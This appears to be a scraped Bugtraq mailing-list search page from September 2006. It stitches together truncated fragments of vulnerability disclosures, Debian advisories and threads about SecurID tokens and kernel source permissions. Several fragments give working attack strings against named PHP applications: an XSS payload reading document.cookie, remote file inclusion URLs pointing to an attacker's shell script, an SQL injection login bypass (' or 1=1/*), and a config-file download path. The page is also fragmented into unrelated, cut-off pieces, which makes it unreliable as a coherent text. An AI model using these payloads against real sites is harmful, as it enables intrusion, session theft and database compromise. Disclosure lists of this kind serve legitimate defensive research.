Hi,
9 Eylül 2006 Cumartesi 13:24 tarihinde, [EMAIL PROTECTED] şunları
yazmıştı:
[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 05.09.2006
- Public: 09.09.2006
SecurityAlert Id: 42
CVE: CVE-2006-4625
On 7 Sep 2006 16:58:56 -, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
It sees Following threads:
http://www.google.co.ve/search?hl=esq=%22Powered+by+Wordpress+2.0.5%22meta=
Version 2.0.4 No Vulnerable.
perhaps there was a bad Interpretation in the version of Wodpress, but that is
thus.
[W]orld [D]efacers Team
==
Summary
eVuln ID: WD23
Vendor: SimpleBoard Mambo Component 1.1.0
Vendor's Web Site: mamboxchange.com/projects/simpleboard
Class: Remote
PoC/Exploit: Available
Solution: Not Available
September 20-22
Austin, Texas
http://www.consec.org
ConSec, the Southwest Regional Symposium on Business Continuity, Information
Security IT Audit. This Symposium is celebrating 10 years running. Events in
the last few years have heightened the need for and understanding of these
topics.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1159-2[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
September 8th, 2006
###
#Web Server Creator v0.1 (l) Remote Include Vulnerability
#Author: XORON
#URL:
Hello,,
XHP CMS v0.5.1 Vuls
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [EMAIL PROTECTED]
Xss
index.php?errcode=scriptalert(document.cookie);/script
Full path
action.php?action=1module=engine
On Fri, 8 Sep 2006, Raj Mathur wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hadmut == Hadmut Danisch [EMAIL PROTECTED] writes:
Hadmut [snip]
Hadmut When unpacking such an archive, tar also sets the uid,
Hadmut gid, and file permissions given in the tar
Hadmut archive.
Hello
MagpieRSS (a simple RSS integration tool) Full path vul
magpierss/rss_fetch.inc.php
magpierss/rss_parse.inc.php
Hi Frank,
Frank Reißner schrieb am Fri, 8 Sep 2006 03:14:15 +0200:
You can bypass unset in php 4.4.4 and 5.14. :)
Yes. But that's a vulnerability in PHP, not in
whatever script make use of it.
Regards
Carsten
--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz
Hi Hadmut, by the way cross post is bad so I'll reply only in bugtraq. The ones
you
report are not, IMHO, vulnerability in Linux Kernel source code archive.
May be you want to administer your severs ina secure fashoned way involving a
proper ownership access to /user/src and /lib/modules path
:: Vikingboard 0.1b Multiple Vulnerabilities ::
Software : Vikingboard
Website : http://www.vikingboard.com/
Discover : Hessam-x / www.hessamx.net
I. Cross Site Scripting Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1174-1[EMAIL PROTECTED]
http://www.debian.org/security/ Noah Meyerhans
September 11th, 2006
vendor : www.idevspot.com
version : all version
By : s3rv3r_hack3r
www : hackerz.ir h4ckerz.com
http://localhost/textads/clients/delete.php?id=[xss]
http://victim/textads/clients/error.php?error[xss]
and more...
+
+
+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion
+
+ Original advisory:
+
http://www.bb-pcsecurity.de/Websecurity/415/org/PUMA_1.0_RC_2_(config.php)_RFI.htm
+
+
+
+ PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include
Vulnerabilities
+
+---
+
+ Affected Software .: Software
+ Version .: PHP
+
+
+ Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities
+
+---
+
+ Affected Software .: Software
+ Version .: Open
+
+
+ ppalCart V(2.5 EE) Remote File Inclusion
+
+---
+
+ Affected Software .: Software
+ Version .: ppalCart 2.5 EE
+ Venedor ...:
Hello
HotPlug CMS Config File Include Vulnerability
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : [EMAIL PROTECTED]
After Script Url Add
includes/class/config.inc
And you will download the config file ,, so that you will be able to connect by
On 9/9/06, Lyal Collins [EMAIL PROTECTED] wrote:
If there's malware on the machine, and there is a connected USB token, then
authentication is only as good as the password - malware can probe the
connected token as often as desired.
snip
In theory, with trusted data paths everywhere (internal
# SIPS v 0.2.2 = = = = = = = = = = = = = Remote File Include Vulnerability ;
# Discovred By : ThE__LeO ;
# Software : SIPS v 0.2.2 ;
# Exploit :
http://Www.Example.Com/[Script]/sipssys/code/box.inc.php?config[sipssys]=[U r
Evil Script] ;
# Greetz :
vendor :www.idevspot.com
Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange
By : s3rv3r_hack3r
www: hackerz.ir h4ckerz.com
remote file include :
http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]
xss:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1173-1[EMAIL PROTECTED]
http://www.debian.org/security/ Noah Meyerhans
September 10th, 2006
Hello
insert this code in your project :
=
private sub Label1_click()
msgbox(prompt,vbokcancel,test,,test) as vbmsgboxresult
end sub
=
PoC : http://silversmith.persiangig.com/PoC.rar
=
Abolfazl Mallahzadeh
Ashiyane Digital Security Team
# C-News v 1.0.1 = = = = = = = = = = = = = Multiple Remote File Include
Vulnerabilities ;
# Discovred By : ThE__LeO ;
# Software : C-News v 1.0.1 ;
# Exploit :
http://Www.Example.Com/[Script]/affichage/pagination.php?path=[U r Evil Script]
;
#SolpotCrew
Community
#
#Mcgallerypro (path_to_folder) Remote File Inclusion
#
#Download file : http://phpforums.net/mcgp/mcgp.zip/mcgp.zip
#
Author: ShAnKaR
Title: multiple PHP application poison NULL byte vulnerability
Applications: phpBB 2.0.21, punBB 1.2.12
Threat Level: Critical
Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
Poison NULL byte vulnerability for perl CGI applications was described
in
If there's malware on the machine, and there is a connected USB token, then
authentication is only as good as the password - malware can probe the
connected token as often as desired.
And this data stream to the authentication host is still subject to a
variety of MITM attacks.
In the event of an
Hello
Title : CMS.R. the Content Management System admin authentication baypass
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : [EMAIL PROTECTED]
The Vulnerability works 100% with magic_quotes_gpc = off
put the user name value (' or 1=1/*)
[code]
'
Dear Brian Eaton,
--Monday, September 11, 2006, 7:35:08 PM, you wrote to [EMAIL PROTECTED]:
It means, if authentication schema is NTLM-compatible (it must be for
compatibility with pre-Windows 2000 hosts and some network
applications, like Outlook Express), attacker can use
Hi,
There are 2 sql injections in Tikiwiki 1.9.4 (and maybe before versions) :
I) There is a call to get_process() function in tiki-g-admin_processes.php
file, without checking pid parameter :
File /tiki-g-admin_processes.php, Line 35 :
:: $info = $processManager-get_process($_REQUEST[pid]);
On 9/11/06, 3APA3A [EMAIL PROTECTED] wrote:
BE Two-factor auth cannot be said to make accessing the network from a
BE compromised PC safe. That does not make two-factor auth useless.
BE With plain passwords, once the attacker has the password, they can
BE access the network at will. With
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hadmut Danisch wrote:
Hi,
there's a severe vulnerability in the Linux kernel
source code archives:
It is my understanding that the permissions are
intentionally set that way.
This hash been discussed several times over the
past year.
On 9/9/06, 3APA3A [EMAIL PROTECTED] wrote:
Dear Hadmut Danisch,
2-factor authentication is not a way to protect against malware.
Well, it protects - the authentication process.
SecurID authentication supports single sign-on technology. As a weak
side of this technology, it means,
Dear Bojan Zdrnja,
--Sunday, September 10, 2006, 2:51:06 AM, you wrote to [EMAIL PROTECTED]:
The only additional attack factor this issue creates is attacker can
get _physical_ access to console with user's credentials _any time_
while user is logged in, while in case token can
On 9/8/06, Hadmut Danisch [EMAIL PROTECTED] wrote:
Hi,
I recently tested an RSA SecurID SID800 Token
http://www.rsasecurity.com/products/securid/datasheets/SID800_DS_0205.pdf
The token is bundled with some windows software designed to make
user's life easier. Interestingly, this software
Dear Brian Eaton,
--Saturday, September 9, 2006, 6:12:31 PM, you wrote to [EMAIL PROTECTED]:
BE For web SSO in particular, accessing the token once is nearly as good
BE as accessing it constantly. The token will be used for the initial
BE authentication, but normally a cookie will be used for
37 matches
Mail list logo